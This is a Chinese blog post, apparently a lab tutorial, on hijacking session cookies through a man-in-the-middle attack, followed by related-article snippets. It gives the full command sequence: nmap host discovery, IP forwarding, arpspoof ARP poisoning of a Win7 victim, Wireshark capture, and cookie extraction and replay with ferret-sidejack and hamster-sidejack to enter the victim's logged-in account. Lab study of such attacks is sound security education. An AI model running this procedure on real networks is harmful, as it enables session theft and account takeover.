中间人攻击劫持cookie

最新推荐文章于 2025-01-02 05:15:00 发布
最新推荐文章于 2025-01-02 05:15:00 发布
阅读量1.2k 收藏 9
点赞数 1
分类专栏: 入侵防御与internet协议 Kali  文章标签: 网络 前端 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/127538074
版权
该博客介绍了通过中间人攻击实现Cookie劫持的实验。先阐述原理,即对靶机进行中间人攻击并抓包,处理分析流量截取cookie。接着说明实验准备,包括攻击机和靶机的模式及工具安装。最后详细讲述实验流程,如扫描主机、抓包攻击、分析和利用cookie等。
摘要由CSDN通过智能技术生成

目录

一、原理

二、实验准备

三、实验流程

①nmap扫描存活主机

②开启抓包进行中间人攻击

③使用ferret分析cookie

④使用hamster进行cookie利用

最后

一、原理

前面在XSS第一章中写道过,Cookie的原理,也演示了Cookie劫持的效果

传送门

这里是通过不同方法即中间人攻击来实现cookie劫持

先对靶机进行中间人攻击同时开启抓包,靶机在成功登陆(这里使用超星)后,对流量进行处理分析从而截取cookie

二、实验准备

攻击机kali 桥接模式,靶机win7 桥接模式,cookie分析

kali中安装工具 ferret——分析Cookie

dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386

阿里源下载这个很慢,如果慢的话换这个

 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
 deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

安装工具Hamster——利用Cookie

apt-get install hamster-sidejack

三、实验流程

①nmap扫描存活主机

攻击机扫描当前网段,拿到win7的ip

nmap -sn 172.20.10.*

这里是我的网段,记得改成自己的网段

扫描到win7的ip为172.20.10.12

网关为127.20.10.1

②开启抓包进行中间人攻击

注:记得把流量转发开了,要不然就是断网攻击了

开启流量转发:

cho 1 >/proc/sys/net/ipv4/ip_forward

开启wireshark选择eth0

发起中间人攻击

arpspoof -i eth0 -t 网关 靶机ip -r

 使用靶机登陆任意网站

 登陆完成后返回kali关闭中间人攻击,将劫持的流量文件保存为.pacp文件

③使用ferret分析cookie

处理流量生成Cookies文件hasmter.txt

ferret-sidejack -r test.pacp

可以看到提取到了cookie文件,并且生成了hamster.txt

④使用hamster进行cookie利用

启动hamster

hamster-sidejack

这里提示浏览器设置代理127.0.0.1:1234

设置完之后访问 127.0.0.1:1234

进入这个页面,看到这个172.20.10.12了嘛,眼熟就是win7的ip

点击进入

看到很多链接,随便点一个看到这些东西,因为这些链接都是中间过程不是网页,我们找到刚才用靶机登陆的域名

 

 可以看到直接就进入了个人主页,没有让我们登陆,直接可以用win7登陆的账号操作

最后

在win7中进行注销,cookie对应的session就销毁了,这个cookie也就没用了

中间人攻击Cookie
03-24
某培训机构网课,平平淡淡,入门级别的东西
Lanmitm:Android中间人攻击测试工具
04-12
Lanmitm — Android中间人攻击测试工具 #####下载说明:安装文件请直接进入download目录下载,开发版请自行导入eclipse中运行 更新历史 ####v1.2.1版本说明 (2014-12-15) 1、修复bug ####v1.2版本说明 (2014-12-12) ...
会话劫持 Kali
05-05 2389
1.工具介绍 网络数据包信息收集工具ferret-sidejack 网络数据包传递用户的各种操作和对应的信息。但是由于各种数据混在一起,不利于渗透测试人员分析。Kali Linux提供了一款信息搜集工具ferret-sidejack。该工具既可以从网络接口直接读取数据,也可以读取数据抓包文件。该工具会过滤掉大部分格式性数据,只保留更为有价值的数据,如IP地址、Mac地址、主机名、操作类型...
网络安全威胁——中间人攻击,从零基础到精通,收藏这篇就够了!
最新发布
Python_0011的博客
01-02 1218
中间人攻击(Man-in-the-Middle Attack,简称MITM),是一种会话劫持攻击攻击者作为中间人劫持通信双方会话并操纵通信过程,而通信双方并不知情,从而达到窃取信息或冒充访问的目的。中间人攻击是一个统称,具体的攻击方式有很多种,例如Wi-Fi仿冒、邮件劫持、DNS欺骗、SSL劫持等。中间人攻击常用于窃取用户登录凭据、电子邮件和银行账户等个人信息,是对网银、网游、网上交易等在线系统极具破坏性的一种攻击方式。
中间人攻击劫持登录会话(cookies)
weixin_30532759的博客
01-23 470
关于中间人攻击 中间人攻击(Man-in-the-MiddleAttack,简称"MITM攻击")是一种"间接"的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为"中间人"。 因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回...
中间人劫持攻击
Bulldozer_GD的博客
11-02 3207
中间人劫持攻击 ,HTTPS在建立了TCP连接之后,会进行SSL握手(SSL Handshake)来校验证书,协商加密协议和对称加密的密钥,之后就会使用协商好的密钥来进行传输。所以HTTPS攻击一般分为SSL连接建立前的攻击,以及HTTPS传输过程中的攻击; 常见的HTTPS中间人攻击,首先需要结合ARP、DNS欺骗等技术,来对会话进行拦截, 1、SSL证书欺骗攻击 此类攻击较为简单常见。首先通过ARP欺骗、DNS劫持甚至网关劫持等等,将客户端的访问重定向到攻击者的机器,让客户端机器与攻击者机器建立HTTP
简述中间人劫持攻击
GdutLq的博客
04-07 782
中间人攻击(Man-in-the-Middle Attack, MITM)就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。 ![image](https://img-blog.csdnimg.cn/img_convert/c59b157adb92b5c3d73da1343f6e07a9.png#pic_center) 假设爱丽丝(Alice)希望与鲍伯(Bob)通信。同时,马洛里(Mallory)希望拦截窃会话以进行窃听并可能在某些时候传送给鲍伯一个虚假的消息。 首先,爱丽丝
Fiddler特殊中间人劫持数据
热门推荐
Codeooo 博客
08-18 1万+
Fiddler中间人特殊劫持数据 如果遇到加密严重的情况下,又想拿到数据,可采取该方法。 1.在菜单栏中 Rules下找到Customize Rules (快捷键 CTRL + R) 2.在 Fiddler ScriptEditor 中 修改 OnBeforeResponse 函数,达到控制Response返回的数据。 3.将修改的函数保存,重启后可以将数据写入本地。 public static var company_id: String = ''; static function OnBefo
前端安全之XSS,CSRF,中间人攻击(MITM攻击),SQL 注入概念详解
qq_43477721的博客
07-01 1427
1. 什么中间人攻击 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”):是指攻击者与通讯的两端分别创建独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全控制。在中间人攻击中,攻击者可以拦截通讯双方的通话并插入新的内容。 概括:请求或响应在传输途中,遭攻击者拦截并篡改内容的攻击 中间人攻击是一个(缺乏)相互认证的攻击。占据两个参与者之间的通信通道是中间人攻击的核心。 大多数的加密协议都专门加入了一些特
深入理解内网中的Cookie截取及中间人攻击
在此案例中,我们将讨论与Cookie有关的中间人攻击手段。 ### Cookie简介 Cookie服务器发送到用户浏览器并保存在本地的一小块数据,它会在用户下次向同一服务器再发起请求时被携带并发送到服务器上。Cookie常用于...
安全防范知识点(XSS、CSRF、点击劫持中间人攻击
远方
03-11 2506
什么是XSS攻击?如何防范XSS攻击?什么是CSP? XSS简单来说,就是攻击者想尽一切办法可以执行的代码注入到网页中。 XSS可以分为多种类型,但是总体上分为两类:持久型和非持久型。 持久型也就是攻击的代码被服务端写入数据库中,这种攻击危害性很大,因为如果网站访问量很大的话,就会到导致大量正常访问页面的用户都受到攻击。 举个例子,对于评论功能来说,就是防范持久型XSS攻击,因为我可以在评论中输入...
中间人攻击(MITM)---常见攻击方法及原理
daibaohui的博客
02-19 1009
相关学习资料 http://www.cnblogs.com/LittleHann/p/3733469.html http://www.cnblogs.com/LittleHann/p/3738141.html http://www.cnblogs.com/LittleHann/p/3741907.html http://www.cnblogs.com/LittleHann/p/3708222.html http://www.icylife.net/blog/?p=371&replytoco.
【投稿】中间人攻击劫持会话
Coisini的博客
06-21 777
前段时间redrain大神和一个学院派教授争执最后连国民老公—-王思聪都来观战啦!! 局域网再次进入了公众的视野~ 局域网内无隐私! 这两天没什么事情查了查中间人攻击 结果发现网络上面的资料并不是很完全 所以写了这篇文章给小黑们进行参考 本人水平有限 大牛们不喜勿喷。。。 本次的中间人攻击使用DHCP来劫持DNS 个人感觉测试了几回后效果比arp欺骗要好很多 拓扑 路由器:192.168...
kali实现Cookie会话劫持
weixin_45971758的博客
02-28 1028
HTTP 会话cookie劫持,使用kali登录用户。
HTTPS连接过程以及中间人攻击劫持
maogugu0319的博客
05-08 462
HTTPS连接过程 https协议就是http+ssl协议,如下图所示为其连接过程: 1.https请求 客户端向服务端发送https请求; 2.生成公...
网络安全威胁——中间人攻击
聚集机器学习、信息安全
12-02 3002
中间人攻击(Man-in-the-Middle Attack,简称MITM),是一种会话劫持攻击攻击者作为中间人劫持通信双方会话并操纵通信过程,而通信双方并不知情,从而达到窃取信息或冒充访问的目的。
中间人攻击(实验)
保持微笑的博客
12-30 955
ettercap软件
Web安全之Cookie劫持
weixin_33943836的博客
07-03 408
  1.Cookie是什么? 2.窃取的原理是什么? 3.系统如何防Cookie劫持呢? 看完这三个回答,你就明白哪位传奇大侠是如何成功的!!! Cookie: HTTP天然是无状态的协议,为了维持和跟踪用户的状态,引入了Cookie和Session。Cookie包含了浏览器客户端的用户凭证,相对较小。Session则维护在服务器,用于维护相对较大的用...
前端页面劫持和反劫持
xuyuwas的博客
10-11 3996
前端页面劫持和反劫持 页面劫持 使用HTTP请求请求一个网站页面的时候,网络运营商会在正常的数据流中插入精心设计的网络数据报文,让客户端(通常是浏览器)展示“错误”的数据,通常是一些弹窗,宣传性广告或者直接显示某网站的内容。 常见劫持手段 跳转型劫持: 用户输入地址A,但是跳转到地址B 为了获取流量,一些电商或者类似百度这样需要流量合作的网站都会有自己的联盟系统,通过给予一些奖励来获取导流,比...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值